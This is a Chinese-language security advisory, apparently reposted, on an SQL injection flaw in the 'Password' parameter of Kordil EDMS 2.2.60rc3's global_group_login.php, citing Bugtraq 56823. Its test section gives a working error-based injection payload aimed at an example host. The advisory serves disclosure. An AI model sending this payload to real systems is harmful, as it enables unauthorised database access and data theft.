Kordil EDMS v2.2.60rc3 'Password'参数SQL注入漏洞

文章由LinuxBoy分享于2019-04-02 05:04:18热评（35）

发布日期：2012-12-05
更新日期：2012-12-07

受影响系统：
sourceforge Kordil EDMS 2.2.60rc3
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 56823

Kordil EDMS是文档控制和管理系统。

Kordil EDMS 2.2.60rc3及其他版本没有正确过滤global_group_login.php页面的'Password'参数值，远程攻击者可利用此漏洞进行非法操作数据库。

<*来源：Woody Hughes （woody@thewoodman.org）

链接：http://packetstormsecurity.org/files/118622/INGRES-12052012.txt
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Script: http://www.example.com/kordil/global_group_login.php

Payload: User=admin&amp;Password=12345' AND EXTRACTVALUE(1299,CONCAT(0x5c,0x3a6a6f793a,(SELECT (CASE

WHEN (1299=1299) THEN 1 ELSE 0 END)),0x3a6a77683a)) AND

'hax'='hax&amp;act=n&amp;QS_Submit=Submit

建议：
--------------------------------------------------------------------------------
厂商补丁：

sourceforge
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://sourceforge.net/projects/kordiledms/files/latest/download

推荐文章：